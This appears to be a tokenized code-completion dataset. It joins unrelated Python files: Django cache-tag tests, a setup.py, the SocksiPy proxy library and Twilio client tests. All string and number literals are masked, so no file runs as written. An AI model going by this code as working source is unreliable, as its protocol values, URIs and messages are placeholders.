        if len(tokens) < 4:
            raise template.TemplateSyntaxError(
                "<STR_LIT>" % tokens[0])
        expire_time, multiplicator, fragment_name = tokens[1], tokens[2], tokens[3]
        return expire_time, multiplicator, fragment_name, tokens[4:]

    def prepare_params(self):
        """Resolve the multiplicator from the context, then continue as usual."""
        raw_value = template.Variable(self.node.multiplicator).resolve(self.context)
        self.multiplicator = int(raw_value)
        super(TestCacheTag, self).prepare_params()

    def get_expire_time(self):
        """Scale the parent's expiry time by the multiplicator."""
        return self.multiplicator * super(TestCacheTag, self).get_expire_time()


TestCacheTag.register(register, '<STR_LIT>', '<STR_LIT>')


class FailingCacheSetCacheTag(CacheTag):
    """Cache tag whose cache writes always fail."""

    def cache_set(self, to_cache):
        raise ValueError('<STR_LIT>')


FailingCacheSetCacheTag.register(register, '<STR_LIT>')


class FailingCacheGetCacheTag(CacheTag):
    """Cache tag whose cache reads always fail."""

    def cache_get(self):
        raise ValueError('<STR_LIT>')


FailingCacheGetCacheTag.register(register, '<STR_LIT>')
<s> import ast <EOL> import codecs <EOL> import os <EOL> from pip . req import parse_requirements <EOL> from setuptools import setup , find_packages <EOL> package_name = '<STR_LIT>' <EOL> long_doc_file = '<STR_LIT>' <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> try : <EOL> from pip . download import PipSession <EOL> except ImportError : <EOL> parse_args = { } <EOL> else : <EOL> parse_args = { '<STR_LIT>' : PipSession ( ) } <EOL> def get_requirements ( source ) : <EOL> install_reqs = parse_requirements ( source , ** parse_args ) <EOL> return set ( [ str ( ir . req ) for ir in install_reqs ] ) <EOL> class VersionFinder ( ast . NodeVisitor ) : <EOL> def __init__ ( self ) : <EOL> self . data = { } <EOL> def visit_Assign ( self , node ) : <EOL> if node . targets [ <NUM_LIT:0> ] . id in ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) : <EOL> self . data [ node . targets [ <NUM_LIT:0> ] . id [ <NUM_LIT:2> : - <NUM_LIT:2> ] ] = node . value . s <EOL> def read ( * path_parts ) : <EOL> filename = os . path . join ( os . path . dirname ( __file__ ) , * path_parts ) <EOL> with codecs . open ( filename , encoding = '<STR_LIT:utf-8>' ) as fp : <EOL> return fp . read ( ) <EOL> def find_info ( * path_parts ) : <EOL> finder = VersionFinder ( ) <EOL> node = ast . parse ( read ( * path_parts ) ) <EOL> finder . visit ( node ) <EOL> info = finder . data <EOL> info [ '<STR_LIT>' ] = ast . 
get_docstring ( node ) <EOL> return info <EOL> package_info = find_info ( package_name , '<STR_LIT>' ) <EOL> setup ( <EOL> name = package_name , <EOL> version = package_info [ '<STR_LIT:version>' ] , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> description = package_info [ '<STR_LIT>' ] , <EOL> long_description = read ( long_doc_file ) , <EOL> url = package_info [ '<STR_LIT>' ] , <EOL> author = package_info [ '<STR_LIT>' ] , <EOL> author_email = package_info [ '<STR_LIT>' ] , <EOL> install_requires = get_requirements ( '<STR_LIT>' ) , <EOL> license = package_info [ '<STR_LIT>' ] , <EOL> classifiers = classifiers , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> import socket <EOL> import struct <EOL> import sys <EOL> if getattr ( socket , '<STR_LIT>' , None ) is None : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> PROXY_TYPE_SOCKS4 = <NUM_LIT:1> <EOL> PROXY_TYPE_SOCKS5 = <NUM_LIT:2> <EOL> PROXY_TYPE_HTTP = <NUM_LIT:3> <EOL> _defaultproxy = None <EOL> _orgsocket = socket . socket <EOL> class ProxyError ( Exception ) : pass <EOL> class GeneralProxyError ( ProxyError ) : pass <EOL> class Socks5AuthError ( ProxyError ) : pass <EOL> class Socks5Error ( ProxyError ) : pass <EOL> class Socks4Error ( ProxyError ) : pass <EOL> class HTTPError ( ProxyError ) : pass <EOL> _generalerrors = ( "<STR_LIT:success>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks5errors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks5autherrors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks4errors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def setdefaultproxy ( proxytype = None , addr = None , port = None , rdns = True , username = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> global _defaultproxy <EOL> _defaultproxy = ( proxytype , addr , port , rdns , username , password ) <EOL> def wrapmodule ( module ) : <EOL> """<STR_LIT>""" <EOL> if _defaultproxy != None : <EOL> module . socket . socket = socksocket <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> class socksocket ( socket . socket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , family = socket . AF_INET , type = socket . SOCK_STREAM , proto = <NUM_LIT:0> , _sock = None ) : <EOL> _orgsocket . 
__init__ ( self , family , type , proto , _sock ) <EOL> if _defaultproxy != None : <EOL> self . __proxy = _defaultproxy <EOL> else : <EOL> self . __proxy = ( None , None , None , None , None , None ) <EOL> self . __proxysockname = None <EOL> self . __proxypeername = None <EOL> def __recvall ( self , count ) : <EOL> """<STR_LIT>""" <EOL> data = self . recv ( count ) <EOL> while len ( data ) < count : <EOL> d = self . recv ( count - len ( data ) ) <EOL> if not d : raise GeneralProxyError ( ( <NUM_LIT:0> , "<STR_LIT>" ) ) <EOL> data = data + d <EOL> return data <EOL> def setproxy ( self , proxytype = None , addr = None , port = None , rdns = True , username = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> self . __proxy = ( proxytype , addr , port , rdns , username , password ) <EOL> def __negotiatesocks5 ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> if ( self . __proxy [ <NUM_LIT:4> ] != None ) and ( self . __proxy [ <NUM_LIT:5> ] != None ) : <EOL> self . sendall ( struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> else : <EOL> self . sendall ( struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> chosenauth = self . __recvall ( <NUM_LIT:2> ) <EOL> if chosenauth [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if chosenauth [ <NUM_LIT:1> : <NUM_LIT:2> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> pass <EOL> elif chosenauth [ <NUM_LIT:1> : <NUM_LIT:2> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . sendall ( chr ( <NUM_LIT> ) . encode ( ) + chr ( len ( self . __proxy [ <NUM_LIT:4> ] ) ) + self . __proxy [ <NUM_LIT:4> ] + chr ( len ( self . __proxy [ <NUM_LIT:5> ] ) ) + self . __proxy [ <NUM_LIT:5> ] ) <EOL> authstat = self . __recvall ( <NUM_LIT:2> ) <EOL> if authstat [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . 
close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if authstat [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise Socks5AuthError ( ( <NUM_LIT:3> , _socks5autherrors [ <NUM_LIT:3> ] ) ) <EOL> else : <EOL> self . close ( ) <EOL> if chosenauth [ <NUM_LIT:1> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> raise Socks5AuthError ( ( <NUM_LIT:2> , _socks5autherrors [ <NUM_LIT:2> ] ) ) <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> req = struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> try : <EOL> ipaddr = socket . inet_aton ( destaddr ) <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + ipaddr <EOL> except socket . error : <EOL> if self . __proxy [ <NUM_LIT:3> ] : <EOL> ipaddr = None <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + chr ( len ( destaddr ) ) . encode ( ) + destaddr <EOL> else : <EOL> ipaddr = socket . inet_aton ( socket . gethostbyname ( destaddr ) ) <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + ipaddr <EOL> req = req + struct . pack ( "<STR_LIT>" , destport ) <EOL> self . sendall ( req ) <EOL> resp = self . __recvall ( <NUM_LIT:4> ) <EOL> if resp [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> elif resp [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> if ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <= <NUM_LIT:8> : <EOL> raise Socks5Error ( ( ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) , _socks5errors [ ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) ] ) ) <EOL> else : <EOL> raise Socks5Error ( ( <NUM_LIT:9> , _socks5errors [ <NUM_LIT:9> ] ) ) <EOL> elif resp [ <NUM_LIT:3> : <NUM_LIT:4> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> boundaddr = self . 
__recvall ( <NUM_LIT:4> ) <EOL> elif resp [ <NUM_LIT:3> : <NUM_LIT:4> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> resp = resp + self . recv ( <NUM_LIT:1> ) <EOL> boundaddr = self . __recvall ( ord ( resp [ <NUM_LIT:4> : <NUM_LIT:5> ] ) ) <EOL> else : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> boundport = struct . unpack ( "<STR_LIT>" , self . __recvall ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> self . __proxysockname = ( boundaddr , boundport ) <EOL> if ipaddr != None : <EOL> self . __proxypeername = ( socket . inet_ntoa ( ipaddr ) , destport ) <EOL> else : <EOL> self . __proxypeername = ( destaddr , destport ) <EOL> def getproxysockname ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __proxysockname <EOL> def getproxypeername ( self ) : <EOL> """<STR_LIT>""" <EOL> return _orgsocket . getpeername ( self ) <EOL> def getpeername ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __proxypeername <EOL> def __negotiatesocks4 ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> rmtrslv = False <EOL> try : <EOL> ipaddr = socket . inet_aton ( destaddr ) <EOL> except socket . error : <EOL> if self . __proxy [ <NUM_LIT:3> ] : <EOL> ipaddr = struct . pack ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> rmtrslv = True <EOL> else : <EOL> ipaddr = socket . inet_aton ( socket . gethostbyname ( destaddr ) ) <EOL> req = struct . pack ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> , destport ) + ipaddr <EOL> if self . __proxy [ <NUM_LIT:4> ] != None : <EOL> req = req + self . __proxy [ <NUM_LIT:4> ] <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) <EOL> if rmtrslv : <EOL> req = req + destaddr + chr ( <NUM_LIT> ) . encode ( ) <EOL> self . sendall ( req ) <EOL> resp = self . __recvall ( <NUM_LIT:8> ) <EOL> if resp [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . 
close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if resp [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> if ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) in ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) : <EOL> self . close ( ) <EOL> raise Socks4Error ( ( ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) , _socks4errors [ ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) - <NUM_LIT> ] ) ) <EOL> else : <EOL> raise Socks4Error ( ( <NUM_LIT> , _socks4errors [ <NUM_LIT:4> ] ) ) <EOL> self . __proxysockname = ( socket . inet_ntoa ( resp [ <NUM_LIT:4> : ] ) , struct . unpack ( "<STR_LIT>" , resp [ <NUM_LIT:2> : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] ) <EOL> if rmtrslv != None : <EOL> self . __proxypeername = ( socket . inet_ntoa ( ipaddr ) , destport ) <EOL> else : <EOL> self . __proxypeername = ( destaddr , destport ) <EOL> def __negotiatehttp ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> if not self . __proxy [ <NUM_LIT:3> ] : <EOL> addr = socket . gethostbyname ( destaddr ) <EOL> else : <EOL> addr = destaddr <EOL> self . sendall ( ( "<STR_LIT>" + addr + "<STR_LIT::>" + str ( destport ) + "<STR_LIT>" + "<STR_LIT>" + destaddr + "<STR_LIT>" ) . encode ( ) ) <EOL> resp = self . recv ( <NUM_LIT:1> ) <EOL> while resp . find ( "<STR_LIT>" . encode ( ) ) == - <NUM_LIT:1> : <EOL> resp = resp + self . recv ( <NUM_LIT:1> ) <EOL> statusline = resp . splitlines ( ) [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+0020>" . encode ( ) , <NUM_LIT:2> ) <EOL> if statusline [ <NUM_LIT:0> ] not in ( "<STR_LIT>" . encode ( ) , "<STR_LIT>" . encode ( ) ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> try : <EOL> statuscode = int ( statusline [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if statuscode != <NUM_LIT:200> : <EOL> self . 
close ( ) <EOL> raise HTTPError ( ( statuscode , statusline [ <NUM_LIT:2> ] ) ) <EOL> self . __proxysockname = ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . __proxypeername = ( addr , destport ) <EOL> def connect ( self , destpair ) : <EOL> """<STR_LIT>""" <EOL> if ( not type ( destpair ) in ( list , tuple ) ) or ( len ( destpair ) < <NUM_LIT:2> ) or ( type ( destpair [ <NUM_LIT:0> ] ) != type ( '<STR_LIT>' ) ) or ( type ( destpair [ <NUM_LIT:1> ] ) != int ) : <EOL> raise GeneralProxyError ( ( <NUM_LIT:5> , _generalerrors [ <NUM_LIT:5> ] ) ) <EOL> if self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_SOCKS5 : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatesocks5 ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_SOCKS4 : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatesocks4 ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == PROXY_TYPE_HTTP : <EOL> if self . __proxy [ <NUM_LIT:2> ] != None : <EOL> portnum = self . __proxy [ <NUM_LIT:2> ] <EOL> else : <EOL> portnum = <NUM_LIT> <EOL> _orgsocket . connect ( self , ( self . __proxy [ <NUM_LIT:1> ] , portnum ) ) <EOL> self . __negotiatehttp ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) <EOL> elif self . __proxy [ <NUM_LIT:0> ] == None : <EOL> _orgsocket . connect ( self , ( destpair [ <NUM_LIT:0> ] , destpair [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:4> , _generalerrors [ <NUM_LIT:4> ] ) ) </s>
<s> from base import TestbedTest <EOL> from models import InternalEvent <EOL> from handlers import admin <EOL> class AdminTest ( TestbedTest ) : <EOL> def test_no_setup ( self ) : <EOL> self . assertFalse ( admin . setup_occurred ( ) ) <EOL> def test_finished_setup ( self ) : <EOL> admin . finish_setup ( ) <EOL> self . assertTrue ( admin . setup_occurred ( ) ) </s>
<s> import unittest <EOL> from mock import patch <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources . monitor . events import Events <EOL> AUTH = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> BASE_URI = "<STR_LIT>" <EOL> EVENT_SID = "<STR_LIT>" <EOL> class EventTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> uri = "<STR_LIT>" . format ( BASE_URI , EVENT_SID ) <EOL> list_resource = Events ( BASE_URI , AUTH ) <EOL> list_resource . get ( EVENT_SID ) <EOL> request . assert_called_with ( "<STR_LIT:GET>" , uri , auth = AUTH , use_json_extension = False ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_list ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> uri = "<STR_LIT>" . format ( BASE_URI ) <EOL> list_resource = Events ( BASE_URI , AUTH ) <EOL> list_resource . list ( ) <EOL> request . assert_called_with ( "<STR_LIT:GET>" , uri , params = { } , auth = AUTH , use_json_extension = False ) </s>
<s> import unittest <EOL> from nose . tools import assert_equal <EOL> from mock import Mock , patch , ANY <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources import Call , Calls <EOL> AUTH = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> class CallFeedbackTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_call_feedback ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> request . return_value = resp <EOL> mock = Mock ( ) <EOL> mock . uri = '<STR_LIT>' <EOL> call = Call ( mock , '<STR_LIT>' ) <EOL> call . load_subresources ( ) <EOL> feedback = call . feedback . get ( ) <EOL> assert_equal ( <NUM_LIT:5> , feedback . quality_score , <NUM_LIT:5> ) <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_create_call_feedback ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> mock = Mock ( ) <EOL> mock . uri = '<STR_LIT>' <EOL> mock . auth = AUTH <EOL> call = Call ( mock , '<STR_LIT>' ) <EOL> call . load_subresources ( ) <EOL> feedback = call . feedback . create ( <EOL> quality_score = <NUM_LIT:5> , <EOL> issues = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> exp_data = { <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> assert_equal ( <NUM_LIT:5> , feedback . quality_score , <NUM_LIT:5> ) <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , "<STR_LIT>" , <EOL> data = exp_data , auth = AUTH , <EOL> timeout = ANY , use_json_extension = True , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_create_call_feedback_one_request ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . 
return_value = resp <EOL> base_uri = '<STR_LIT>' <EOL> account_sid = '<STR_LIT>' <EOL> auth = ( account_sid , "<STR_LIT>" ) <EOL> calls = Calls ( base_uri , auth ) <EOL> uri = "<STR_LIT>" % base_uri <EOL> feedback = calls . feedback ( <EOL> '<STR_LIT>' , <EOL> quality_score = <NUM_LIT:5> , <EOL> issue = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> exp_data = { <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> assert_equal ( [ '<STR_LIT>' , '<STR_LIT>' ] , feedback . issues ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , uri , <EOL> data = exp_data , auth = auth , <EOL> use_json_extension = True , <EOL> ) <EOL> class CallFeedbackSummaryTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_call_feedback_summary ( self , request ) : <EOL> resp = create_mock_json ( '<STR_LIT>' ) <EOL> request . return_value = resp <EOL> base_uri = '<STR_LIT>' <EOL> account_sid = '<STR_LIT>' <EOL> auth = ( account_sid , "<STR_LIT>" ) <EOL> calls = Calls ( base_uri , auth ) <EOL> uri = "<STR_LIT>" % base_uri <EOL> feedback = calls . summary . get ( ) <EOL> assert_equal ( <NUM_LIT> , feedback . call_count ) <EOL> assert_equal ( <NUM_LIT> , feedback . call_feedback_count ) <EOL> request . assert_called_with ( '<STR_LIT:GET>' , uri , params = { } , auth = auth , <EOL> use_json_extension = True ) </s>
<s> import unittest <EOL> from mock import Mock , patch <EOL> from nose . tools import assert_equal , assert_true <EOL> from tests . tools import create_mock_json <EOL> from twilio . rest . resources . trunking . phone_numbers import ( <EOL> PhoneNumbers <EOL> ) <EOL> API_BASE_URI = "<STR_LIT>" <EOL> ACCOUNT_SID = "<STR_LIT>" <EOL> PHONE_NUMBERS_BASE_URI = "<STR_LIT>" . format ( API_BASE_URI , ACCOUNT_SID , <EOL> "<STR_LIT>" ) <EOL> AUTH = ( ACCOUNT_SID , "<STR_LIT>" ) <EOL> BASE_URI = "<STR_LIT>" <EOL> class PhoneNumbersTest ( unittest . TestCase ) : <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_phone_numbers_lists ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . list ( ) <EOL> assert_equal ( len ( result ) , <NUM_LIT:1> ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sid , '<STR_LIT>' ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . account_sid , <EOL> '<STR_LIT>' ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . voice_caller_id_lookup , False ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . 
address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . beta , False ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . url , <EOL> "<STR_LIT>" . <EOL> format ( BASE_URI ) ) <EOL> assert_equal ( result [ <NUM_LIT:0> ] . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" . format ( BASE_URI ) , <EOL> auth = AUTH , <EOL> params = { } , <EOL> use_json_extension = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_phone_numbers_instance ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT:200> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . get ( '<STR_LIT>' ) <EOL> assert_equal ( result . sid , '<STR_LIT>' ) <EOL> assert_equal ( result . account_sid , '<STR_LIT>' ) <EOL> assert_equal ( result . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result . voice_caller_id_lookup , False ) <EOL> assert_equal ( result . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result . beta , False ) <EOL> assert_equal ( result . url , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) ) <EOL> assert_equal ( result . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> request . 
assert_called_with ( <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_associate_phone_numbers_instance ( self , request ) : <EOL> resp = create_mock_json ( <EOL> '<STR_LIT>' ) <EOL> resp . status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . create ( '<STR_LIT>' ) <EOL> assert_equal ( result . sid , '<STR_LIT>' ) <EOL> assert_equal ( result . account_sid , '<STR_LIT>' ) <EOL> assert_equal ( result . trunk_sid , "<STR_LIT>" ) <EOL> assert_equal ( result . friendly_name , "<STR_LIT:Name>" ) <EOL> assert_equal ( result . phone_number , "<STR_LIT>" ) <EOL> assert_equal ( result . api_version , "<STR_LIT>" ) <EOL> assert_equal ( result . voice_caller_id_lookup , False ) <EOL> assert_equal ( result . voice_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . status_callback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_url , <EOL> "<STR_LIT>" ) <EOL> assert_equal ( result . sms_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . sms_fallback_method , "<STR_LIT:POST>" ) <EOL> assert_equal ( result . address_requirements , "<STR_LIT:none>" ) <EOL> assert_equal ( result . beta , False ) <EOL> assert_equal ( result . url , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) ) <EOL> assert_equal ( result . links [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" . format ( PHONE_NUMBERS_BASE_URI , <EOL> "<STR_LIT>" ) ) <EOL> data_dict = dict ( ) <EOL> data_dict [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> request . assert_called_with ( <EOL> "<STR_LIT:POST>" , <EOL> "<STR_LIT>" . format ( BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False , <EOL> data = data_dict , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_disassociate_phone_numbers_instance ( self , request ) : 